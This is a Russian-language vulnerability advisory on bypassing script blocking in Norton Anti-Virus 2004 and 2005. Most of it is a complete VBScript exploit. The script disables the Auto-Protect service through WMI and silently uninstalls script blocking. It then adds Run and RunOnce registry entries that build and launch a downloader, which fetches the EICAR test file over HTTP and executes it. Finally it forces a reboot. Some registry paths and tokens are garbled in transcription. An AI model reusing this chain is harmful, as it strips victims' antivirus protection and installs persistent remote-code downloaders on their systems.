Обход ограничений в Norton Anti-Virus
Программа: Norton Anti-Virus 2004, 2005;
Опасность: Низкая
Наличие эксплоита: Да
Описание:
Уязвимость обнаружена в Norton Anti-Virus. Удаленный атакующий может обойти функцию блокирования и изменить конфигурационный файл антивируса.
Удаленный атакующий может с помощью специально сформированного сценария обойти блокировку сценариев и выполнить злонамеренные действия на системе.
Пример:
—————//// BEGIN DISABLE_NAV.VBS ////——————
‘ —— DISABLE NORTON AUTO-PROTECT SERVICE WITH WMI ——
sServer = «.»
Set oWMI = GetObject(«winmgmts://.»)
sServiceName = «Norton AntiVirus Auto-Protect Service»
sWQL = «Select state from Win32_Service » _
& «Where displayname='» & sServiceName & «‘»
Set oResults = oWMI.ExecQuery(sWQL)
For Each oService In oResults
oService.StopService
oService.ChangeStartMode(«Disabled»)
Next
‘ ——— UNINSTALL SCRIPT BLOCKING WITH WMI 😉 ———-
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = «.»
Set objRegistry =
GetObject(«winmgmts:{impersonationLevel=impersonate}!\.rootdefault:StdRegProv»)
strKeyPath = «SOFTWAREMicrosoftWindowsCurrentVersionRunOnce»
strValueName = «Uninstall Norton Script Blocking»
arrStringValues = («MSIEXEC /x {D327AFC9-7BAA-473A-8319-6EB7A0D40138} /Q»)
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues
‘ ——— CREATE VBS FILE TO GRAB THE EICAR AV-REFERENCE FILE ———
Set objRegistry =
GetObject(«winmgmts:{impersonationLevel=impersonate}!\.rootdefault:StdRegProv»)
strKeyPath = «SOFTWAREMicrosoftWindowsCurrentVersionRunOnce»
strValueName = «Create Code Downloader»
arrStringValues = («cmd /c ECHO Set
X=CreateObject(«+chr(34)+»Microsoft.XMLHTTP»+chr(34)+»):X.open
» +chr(34)+»GET»+chr(34)+»,(«+chr(34)+»http://www.eicar.org/download/eicar.com»+chr(34)+»),False:X.s end:set
Y=createobject(«+chr(34)+»adodb.stream»+chr(34)+»):Y.type=1:Y.open:Y.write
X.responseBody:Y.savetofile(«+chr(34)+»eicar.com»+chr(34)+»),2:Y.close >
estart.VBS»)
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues
‘ ——— CREATE VBS FILE THAT TRIGGERS CODE LAUNCH ———-
Set objRegistry =
GetObject(«winmgmts:{impersonationLevel=impersonate}!\.rootdefault:StdRegProv»)
strKeyPath = «SOFTWAREMicrosoftWindowsCurrentVersionRunOnce»
strValueName = «Create Code Launcer»
arrStringValues = («cmd /c ECHO wscript.sleep(10000):Set
Z=CreateObject(«+chr(34)+»WSCript.Shell»+chr(34)+»):Z.run(«+chr(34)+»cmd
/k eicar.com»+chr(34)+») > elaunch.vbs»)
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues
‘ ——— LAUNCH EICAR DOWNLOADER ———-
Set objRegistry =
GetObject(«winmgmts:{impersonationLevel=impersonate}!\.rootdefault:StdRegProv»)
strKeyPath = «SOFTWAREMicrosoftWindowsCurrentVersionRun»
strValueName = «Execute Code DownLoader»
arrStringValues = («estart.vbs»)
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues
‘ ——— RUN THE ‘VIRUS’ ———-
Set objRegistry =
GetObject(«winmgmts:{impersonationLevel=impersonate}!\.rootdefault:StdRegProv»)
str KeyPath = «SOFTWAREMicrosoftWindowsCurrentVersionRun»
strValueName = «Execute Malicious Code Launcher»
arrStringValues = («elaunch.vbs»)
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues
‘ —- USE WMI TO FORCE A REBOOT — NEXT LOGIN, PWN3D —-
Set wmi = GetObject(«winmgmts:{(Shutdown)}»)
set objset = wmi.instancesof(«win32_operatingsystem»)
for each obj in objset
set os = obj : exit for
next
os.win32shutdown 2 + 4
—————//// END DISABLE_NAV.VBS ////——————
URL производителя: www.symantec.com
Решение: Решение на данный момент не существует
Добавить комментарий